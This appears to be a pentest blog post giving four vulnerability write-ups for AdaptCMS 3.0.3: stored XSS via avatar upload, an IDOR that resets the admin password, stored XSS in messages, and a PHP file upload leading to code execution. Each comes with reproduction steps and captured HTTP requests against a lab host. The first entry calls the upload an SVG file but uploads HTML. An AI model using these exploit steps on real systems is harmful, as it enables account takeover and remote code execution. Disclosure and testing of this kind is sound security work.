MSecure: June 2025

Friday Fun Pentest Series - 29 - Stored XSS via File Upload - adaptcmsv3.0.3

Description

- It was noted that the application file upload functionality allowed SVG files to be uploaded resulting in Stored XSS

Stored XSS via File Upload #1:

Steps to Reproduce:

Login with low privilege user and visit "Profile" > "Edit Your Profile" > "Avatar"
Click on "Choose File" and upload the following file

html-xss.html

<!DOCTYPE html>

<head>

<title>Alert Box Example</title>

// This function will be called when the page loads

function showAlert() {

alert("Hello! This is an alert box.");

}

</script>

</head>

<h1>Welcome to the Alert Box Example</h1>

<p>This page will show an alert box when loaded.</p>

</body>

</html>

// HTTP POST request uploading the XSS file

POST /adaptcms/users/edit HTTP/1.1

Host: 192.168.58.131

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0

[...]

------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4

Content-Disposition: form-data; name="data[User][settings][avatar]"; filename="html-xss.html"

Content-Type: text/html

<!DOCTYPE html>

<html lang="en">

<head>

<meta charset="UTF-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>Alert Box Example</title>

<script>

// This function will be called when the page loads

function showAlert() {

alert("Hello! This is an alert box.");

}

</script>

</head>

<body onload="showAlert()">

<h1>Welcome to the Alert Box Example</h1>

<p>This page will show an alert box when loaded.</p>

</body>

</html>

------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4

Content-Disposition: form-data; name="data[_Token][fields]"

// HTTP Response

HTTP/1.1 200 OK

Date: Fri, 30 May 2025 20:15:54 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Content-Length: 15400

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

[...]

<img src="/adaptcms/uploads/avatars/1_html-xss.html" class="thumbnail col-lg-2" alt="" /> <input type="hidden" name="data[User][settings][old_avatar]" value="1_html-xss.html" id="UserSettingsOldAvatar"/> <div class="clearfix"></div>

[...]

Friday Fun Pentest Series - 28 - IDOR "Change Password" Functionality - adaptcmsv3.0.3

Description

- It was noted that the application was vulnerable to IDOR via the password change functionality resulting in low privilege user being able to change the "admin" password

IDOR "Change Password" Functionality #1:

Steps to Reproduce:

Login as user with low privilege and visit profile page
Select "Edit Your Profile" and click "Submit"
Trap the HTTP POST request
Set "data[User][password]" and "data[User][password_confirm]" values "Passw0rd!"
Set "data[User][id]" value to "1"
This would change the password of the "admin" account

// HTTP POST request changing password

POST /adaptcms/users/edit HTTP/1.1

Host: 192.168.58.131

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36

[...]

4d63437ebea6a2ef6648b29cc1c43ea70600295a

------WebKitFormBoundaryDvhxmc78yz9KfFbn

Content-Disposition: form-data; name="data[User][password]"

Passw0rd!

------WebKitFormBoundaryDvhxmc78yz9KfFbn

Content-Disposition: form-data; name="data[User][password_confirm]"

Passw0rd!

------WebKitFormBoundaryDvhxmc78yz9KfFbn

Content-Disposition: form-data; name="data[User][email]"

privesc-test@test.test

------WebKitFormBoundaryDvhxmc78yz9KfFbn

Content-Disposition: form-data; name="data[User][id]"

------WebKitFormBoundaryDvhxmc78yz9KfFbn

[...]

// HTTP Response

HTTP/1.1 200 OK

Date: Fri, 30 May 2025 19:56:17 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Content-Length: 13925

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

// HTTP POST request logging in with admin account

POST /adaptcms/login HTTP/1.1

Host: 192.168.58.131

Content-Length: 262

Cache-Control: max-age=0

Accept-Language: en-GB,en;q=0.9

Origin: http://192.168.58.131

Content-Type: application/x-www-form-urlencoded

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36

[...]

_method=POST&data[_Token][key]=dc18f92e4d0b810c603f45f2189b220de543a972&data[User][username]=admin&data[User][password]=Passw0rd!&data[_Token][fields]=5ba74a784fe0258a12c30194ef6a09b97a86bb1d%3A&data[_Token][unlocked]=

// HTTP Response

HTTP/1.1 302 Found

Date: Fri, 30 May 2025 19:56:33 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Set-Cookie: adaptcms=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/

Set-Cookie: adaptcms=2aaosqqksob20a98viieaq8j44; expires=Mon, 02-Jun-2025 19:56:33 GMT; Max-Age=259200; path=/; HttpOnly

Location: http://192.168.58.131/adaptcms/admin

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

Friday Fun Pentest Series - 27 - Stored XSS "Send Message" Functionality - adaptcmsv3.0.3

Description

- It was noted that the application was vulnerable to Stored XSS in the "send message" functionality

Stored XSS "Send Message" Functionality #1:

Steps to Reproduce:

Login as normal user and visit "Profile" > "Message" > "Send Message"
In "Message" field enter the following payload "<form action="javascript:alert(1)"><input id="x" type="submit" /></form><label for="x">XSS</label>"
The payload would execute upon viewing the message

// HTTP POST request sending message

POST /adaptcms/messages/send HTTP/1.1

Host: 192.168.58.131

Content-Length: 591

Cache-Control: max-age=0

Accept-Language: en-GB,en;q=0.9

Origin: http://192.168.58.131

Content-Type: application/x-www-form-urlencoded

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36

[...]

_method=POST&data[_Token][key]=aabf09c7e75b47229d84deadd98c6ab65e87f979&data[Message][recipient]=admin&data[Message][title]=test&data[Message][message]=<form action="javascript:alert(1)"><input id="x" type="submit" /></form>

<p><label for="x">XSS</label></p>&data[Message][parent_id]=0&data[Message][receiver_user_id]=1&data[_Token][fields]=a989058dd1dcaad53b324c3233dfc1e8f20ba411%3AMessage.parent_id%7CMessage.receiver_user_id&data[_Token][unlocked]=

// HTTP Response

HTTP/1.1 302 Found

Date: Fri, 30 May 2025 19:01:10 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Location: http://192.168.58.131/adaptcms/messages/index/outbox

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

Friday Fun Pentest Series - 26 - Authenticated File Upload to RCE - adaptcmsv3.0.3

Description

- It was noted that the application file upload functionality was vulnerable to unrestricted file uploads resulting in RCE via webshell file upload

Authenticated File Upload to RCE #1:

Steps to Reproduce:

Login as admin user and visit "System" > "Appearance" > "Themes" > "Default" > "Theme Files" and choose "Add New File"
Select "Add File". In the "File Contents" add the following payload "<?php phpinfo(); ?>"
Choose "File Extension" to be "php" and set "Folder Location" to "Images"
Upon uploading the file it would be available under the "img" directory

// HTTP POST request

POST /adaptcms/admin/themes/asset_add/Default HTTP/1.1

Host: 192.168.58.131

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0

[...]